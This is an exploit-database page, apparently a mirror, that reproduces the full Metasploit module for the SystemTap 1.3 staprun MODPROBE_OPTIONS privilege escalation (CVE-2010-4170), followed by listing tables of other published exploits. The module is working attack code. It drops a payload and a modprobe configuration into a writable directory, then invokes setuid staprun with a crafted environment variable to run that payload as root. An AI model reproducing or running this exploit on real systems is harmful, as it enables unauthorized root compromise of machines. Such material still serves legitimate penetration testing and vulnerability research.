Menu

Search for hundreds of thousands of exploits

"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

linux

Release date

Exploit published date

2019-04-19

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting a
        vulnerability in the `staprun` executable included with SystemTap
        version 1.3.

        The `staprun` executable does not clear environment variables prior to
        executing `modprobe`, allowing an arbitrary configuration file to be
        specified in the `MODPROBE_OPTIONS` environment variable, resulting
        in arbitrary command execution with root privileges.

        This module has been tested successfully on:

        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy', # Discovery and exploit
          'bcoles'         # Metasploit
        ],
      'DisclosureDate' => '2010-11-17',
      'References'     =>
        [
          ['BID', '44914'],
          ['CVE', '2010-4170'],
          ['EDB', '15620'],
          ['URL', 'https://securitytracker.com/id?1024754'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
          ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
          ['URL', 'https://bugs.launchpad.net/bugs/677226'],
          ['URL', 'https://www.debian.org/security/2011/dsa-2348']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def staprun_path
    datastore['STAPRUN_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    # On some systems, staprun execution is restricted to stapusr group:
    # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
    unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
      vprint_error "#{staprun_path} is not executable"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is executable"

    unless setuid? staprun_path
      vprint_error "#{staprun_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is setuid"

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    config_path = "#{base_dir}/#{payload_name}.conf"
    upload config_path, "install uprobes /bin/sh"

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
    vprint_line res
  end
end
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-20"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)"webappsphpindoushka
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"Virtual Freer 1.58 - Remote Command Execution"webappsphpSajjadBnd
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-18"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting"webappsphp"Ultra Security Team"
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting"webappsphp"Ashkan Moghaddas"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"LabVantage 8.3 - Information Disclosure"webappsjava"Joel Aviad Ossi"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
Release DateTitleTypePlatformAuthor
2020-02-10"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init"doslinux"Google Security Research"
2020-02-10"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-02-06"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow"locallinux"Dylan Katz"
2020-02-06"VIM 8.2 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2020-02-05"Socat 1.7.3.4 - Heap-Based Overflow (PoC)"locallinuxhieubl
2020-02-05"xglance-bin 11.00 - Privilege Escalation"locallinuxredtimmysec
2020-02-04"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)"webappslinux"Kevin Joensen"
2020-02-04"Sudo 1.8.25p - Buffer Overflow"locallinux"Joe Vennix"
2020-02-03"BearFTP 0.1.0 - 'PASV' Denial of Service"doslinuxkolya5544
2020-01-30"OpenSMTPD 6.6.2 - Remote Code Execution"remotelinux1F98D
2020-01-23"Pachev FTP Server 1.0 - Path Traversal"remotelinux1F98D
2020-01-23"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-01-15"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"remotelinuxMetasploit
2020-01-14"Redir 3.3 - Denial of Service (PoC)"doslinuxhieubl
2020-01-10"ASTPP 4.0.1 VoIP Billing - Database Backup Download"webappslinux"Fabien AUNAY"
2020-01-08"ASTPP VoIP 4.0.1 - Remote Code Execution"remotelinux"Fabien AUNAY"
2019-12-30"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-12-18"OpenMRS - Java Deserialization RCE (Metasploit)"remotelinuxMetasploit
2019-12-16"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds"locallinux"Google Security Research"
2019-11-29"Bash 5.0 Patch 11 - SUID Priv Drop Exploit"locallinux"Mohin Paramasivam"
2019-11-21"GNU Mailutils 3.7 - Privilege Escalation"locallinux"Mike Gualtieri"
2019-11-20"Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path"doslinux"Google Security Research"
2019-11-20"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs"doslinux"Google Security Research"
2019-11-18"nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)"remotelinux"Guy Levin"
2019-11-08"rConfig - install Command Execution (Metasploit)"remotelinuxMetasploit
2019-11-04"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-11-02"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution"locallinuxanonymous
2019-11-01"ownCloud 10.3.0 stable - Cross-Site Request Forgery"webappslinux"Ozer Goker"
2019-10-24"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)"locallinuxMetasploit
2019-10-23"Rocket.Chat 2.1.0 - Cross-Site Scripting"webappslinux3H34N
Release DateTitleTypePlatformAuthor
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-10"Ricoh Driver - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-10"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-02-10"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)"remotelinux_mipsMetasploit
2020-02-07"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-23"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-01-17"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-15"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"remotelinuxMetasploit
2019-12-30"Microsoft UPnP - Local Privilege Elevation (Metasploit)"localwindowsMetasploit
2019-12-30"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-12-30"OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)"localopenbsdMetasploit
2019-12-18"OpenMRS - Java Deserialization RCE (Metasploit)"remotelinuxMetasploit
2019-11-20"FreeSWITCH - Event Socket Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"FusionPBX - Operator Panel exec.php Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"Bludit - Directory Traversal Image File Upload (Metasploit)"remotephpMetasploit
2019-11-20"Xorg X11 Server - Local Privilege Escalation (Metasploit)"localunixMetasploit
2019-11-20"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)"localwindowsMetasploit
2019-11-20"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)"localwindowsMetasploit
2019-11-08"rConfig - install Command Execution (Metasploit)"remotelinuxMetasploit
2019-11-08"Android Janus - APK Signature Bypass (Metasploit)"localandroidMetasploit
2019-11-04"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-11-01"Nostromo - Directory Traversal Remote Command Execution (Metasploit)"remotemultipleMetasploit
2019-10-24"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)"locallinuxMetasploit
2019-10-22"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)"remotemultipleMetasploit
2019-10-02"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)"remotewindowsMetasploit
2019-09-25"ABRT - sosreport Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-09-24"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)"remotewindowsMetasploit
2019-09-10"October CMS - Upload Protection Bypass Code Execution (Metasploit)"remotephpMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46730/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse